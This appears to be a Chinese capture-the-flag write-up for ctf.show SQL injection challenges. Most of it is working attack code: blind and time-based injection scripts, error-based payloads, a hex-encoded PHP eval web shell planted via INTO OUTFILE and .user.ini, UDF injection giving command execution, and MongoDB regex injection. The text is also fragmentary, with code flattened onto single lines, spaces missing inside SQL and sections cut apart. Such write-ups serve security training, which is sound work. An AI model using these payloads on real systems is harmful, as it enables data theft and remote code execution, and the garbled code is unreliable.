url = "http://258da519-591d-4f61-b9af-c91ccb7af34f.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------查表 #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flagaa'" #--------查flag sql= "select group_concat(flagass) from flagaa" #************************************************************************************************************************************************************* payload = "ctfshow' and if(substr(({}),{},1)='{}',1,0)#"
#计数 n = 0
for i in range(1, 666): for j in str: params = { 'username' : payload.format(sql,i,j), 'password' : "{}".format(i) } res = requests.post(url = url, data = params) ifr"\u66f4\u65b0\u6210\u529f"in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
url = "http://8feb46d5-de26-4836-807f-3d7218bcb7ae.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------查表 #sql= "selectgroup_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag233333'" #--------查flag sql= "selectgroup_concat(flagass233) from flag233333" #************************************************************************************************************************************************************* payload = "ctfshow' and if(substr(({}),{},1)='{}',1,0)#" #计数 n = 0 for i in range(1, 666): for j in str: params = { 'username' : payload.format(sql,i,j), 'password' : "{}".format(i) } res = requests.post(url = url, data = params) if r"\u66f4\u65b0\u6210\u529f" in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
web234
脚本跑不动了,过滤了单引号,这题考的是\实现单引号逃逸
1 2 3 4 5 6 7 8
原来的语句 update ctfshow_user set pass = '{$password}'where username = '{$username}'; 加上\逃逸单引号 update ctfshow_user set pass = '\'where username = '{$username}'; pass里面的内容则变成' where username = username里面的值我们可以随意控制
查表payload
1
username=,username=(selectgroup_concat(table_name) from information_schema.tables where table_schema=database())#&password=\
查字段payload
1
username=,username=(selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666C6167323361)#&password=\
查flag
1
username=,username=(selectgroup_concat(flagass23s3) from flag23a)#&password=\
username=,username=(selectgroup_concat(table_name) from mysql.innodb_table_stats )#&password=\
payload查flag
1
username=,username=(select`2`from (select1,2,3unionselect * from flag23a1)a limit1,1) #&password=\
web236
他多过滤了一个flag,一样可以用上一个payload
1
username=,username=(select`2`from (select1,2,3unionselect * from flaga)a limit1,1) #&password=\
我感觉没过滤,如果真过滤了,也可以base64转过去
1
username=,username=(select to_base64(`2`) from (select 1,2,3 union select * from flaga)a limit 1,1) #&password=\
web237
经典insert注入
查表
1
password=gylq&username=gylqtest',(selectgroup_concat(table_name) from information_schema.tables where table_schema=database()));#
查字段
1
password=gylq&username=gylqtest',(selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'));#
查flag
1
password=gylq&username=gylqtest',(select flagass23s3 from flag));#
url="http://108f39e9-3737-4b40-9285-4441a3360741.challenge.ctf.show:8080/api/insert.php" flag="flag" str="ab" payload="gylq',(select(group_concat(flag))from({})))#" for a in str: for b in str: for c in str: for d in str: for e in str: random=flag+a+b+c+d+e data = { 'username' : payload.format(random) , 'password' : "flag" } res = requests.post(url,data)
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
url = "http://6786d08e-8031-4544-aa67-f4b3028d2c8d.challenge.ctf.show:8080/api/delete.php" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#************************************************************************************************************************************************************* #--------查表 #sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagas'" #--------查flag #sql= "select flagasabc from ctfshow_flagas" #************************************************************************************************************************************************************* payload = "{} and if(substr((select group_concat(flag) from flag),{},1)='{}',1,0)"
#计数 n = 0
for i in range(20, 44): k=i-19 for j in str: params = { 'id' : payload.format(k,i,j) } res = requests.post(url = url, data = params) if r"\u5220\u9664\u6210\u529f" in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
url = "http://f0b20d14-9c8f-49ed-8808-2ebc4115c907.challenge.ctf.show:8080/api/delete.php" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #************************************************************************************************************************************************************* #--------查库名 #sql="database()" #--------查表 #sql= "selectgroup_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'" #--------查flag sql= "select flag from flag" #************************************************************************************************************************************************************* payload = "if(substr(({}),{},1)='{}',sleep(0.1),0)" #计数 n = 0 for i in range(1,666): for j in str: data = { 'id' : payload.format(sql,i,j) } start = time.time() res = requests.post(url = url, data = data) end = time.time() if end-start > 2 and end-start < 3: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
$conn = new mysqli($dbhost,$dbuser,$dbpwd,$dbname); if(mysqli_connect_errno()){ die(json_encode(array(mysqli_connect_error()))); } $conn->query("set name $charName");
$sql = "select * from ctfshow_user where username={$filename};"; $conn->query("set name $charName"); $result = $conn->query($sql); while ($row = mysqli_fetch_array($result)){ echo "u:".$row['username']; echo "p:".$row['pass']; } if(mysqli_affected_rows($conn)){ $ret['msg']="导出{$filename}成功"; }else{ $ret['msg']="导出{$filename}失败"; } mysqli_close($conn); }
# def generateNum(num): # res = 'true' # if num == 1: # return res # else: # for i in range(num-1): # res += "+true" # return res
url = "http://9c4ff2fb-3479-4628-be92-f7dff3560001.challenge.ctf.show:8080/dump/dump.php" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#password=1234567811&username=ctfshow' and if(substr(database(),1,1)='c',1,0)# #************************************************************************************************************************************************************* #--------查表 sql= "select group_concat(table_name) from information_schema.tables where table_schema=database()" #--------查字段 #sql= "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag233333'" #--------查flag #sql= "select group_concat(flagass233) from flag233333" #*************************************************************************************************************************************************************
payload = "'ctfshow' and if(substr(({}),{},1)='{}',1,0)"
#计数 n = 0
for i in range(1, 666): for j in str: params = { 'filename' : payload.format(sql,i,j), } res = requests.post(url = url, data = params) if "u:ctfshowp" in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
filename=gylq.jpg' LINES TERMINATED BY 0x0A3C3F706870206576616C28245F524551554553545B315D293B3F3E0A#
在上传.user.ini文件
1
filename=.user.ini' LINES TERMINATED BY 0x0A6175746F5F70726570656E645F66696C653D67796C712E6A70670A#
接着访问index.php
getshell拿flag
web244
终于来到报错模块了
1 2
//备份表 $sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";
经典报错注入拿表
1
http://8b891a41-b3c2-4892-96e2-88623f86dd70.challenge.ctf.show:8080/api/?id=1' or updatexml(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)%23
拿字段
1
http://8b891a41-b3c2-4892-96e2-88623f86dd70.challenge.ctf.show:8080/api/?id=1' or updatexml(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flag')),1)%23
4. Name_Const(>5.0.12) select * from (selectNAME_CONST(version(),0),NAME_CONST(version(),0))x;
5. Join select * from(select * from mysql.user a join mysql.user b)c; select * from(select * from mysql.user a join mysql.user b using(Host))c; select * from(select * from mysql.user a join mysql.user b using(Host,User))c;
拿表
1
http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23
拿字段
1
http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagsa')))#
拿flag
1 2 3 4 5 6 7 8 9 10
前部分 ctfshow{b2cc23cb-316b-4cea-b9ea 语句 http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select group_concat(flag1) from ctfshow_flagsa)))%23 后部分 a-b9ea-9807145c946a} 语句 http://0fbee15d-4936-43e7-a8f1-3f8e0f8e84c5.challenge.ctf.show:8080/api/?id=1' or extractvalue(1,concat(0x3d,(select right(group_concat(flag1),20) from ctfshow_flagsa)))%23 重复部分删除 ctfshow{b2cc23cb-316b-4cea-b9ea-9807145c946a}
http://b8b5d561-57a2-477f-9c61-17caf1ce6094.challenge.ctf.show:8080/api/?id=1' and (select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_schema=database() and table_name='ctfshow_flags' limit 1,1),floor(rand(0)*2))) %23
flag,没有长度限制
1
http://b8b5d561-57a2-477f-9c61-17caf1ce6094.challenge.ctf.show:8080/api/?id=1' and (select count(*) from information_schema.tables group by concat((select flag2 from ctfshow_flags limit 0,1),floor(rand(0)*2))) %23
union报错查询查flag
1
http://b8b5d561-57a2-477f-9c61-17caf1ce6094.challenge.ctf.show:8080/api/?id=1' union select 1,count(*),concat((select flag2 from ctfshow_flags),floor(rand(0)*2)) a from information_schema.tables group by a %23
web247
过滤了向下取整floor,没过滤ceil向上取整
1
http://b89fec88-85a4-4e59-b9b2-d6c71204e161.challenge.ctf.show:8080/api/?id=1' and (select count(*) from information_schema.tables group by concat((select `flag?` from ctfshow_flagsa),ceil(rand(0)*2))) %23
web248
考点udf注入
一、什么是udf
udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。
select unhex(concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'))) into dumpfile '/usr/lib/mariadb/plugin/udf.so'
最后我们创建sys_eval这个函数来进行命令执行
1
create function sys_eval returns string soname 'udf.so'
for i in range(0,20000,5000): end = i+5000 udf_text.append(udf[i:end])
p = dict(zip(text,udf_text))
for t in text: param=payload.format(p[t],t) get_url = url + param res = requests.get(get_url) print("[*]",end="") code = res.status_code print(code,end="") if code==404: print("你输入的URL可能出错") acq=acquire.format(t) data=url+acq res = requests.get(url=data) if"load_file"in res.text: print("-->成功插入{}.txt".format(t))
url = "http://a2efa0f0-f634-4621-bd4a-e96a4f1b0196.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
payload_user = "flag.*" payload_pass = "^{}.*"
n = 0
for i in range(1, 666): for j in str: data = { 'username[$regex]':payload_user, 'password[$regex]':payload_pass.format(flag+j) } res = requests.post(url = url, data=data) ifr"\u767b\u9646\u6210\u529f"in res.text: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
评论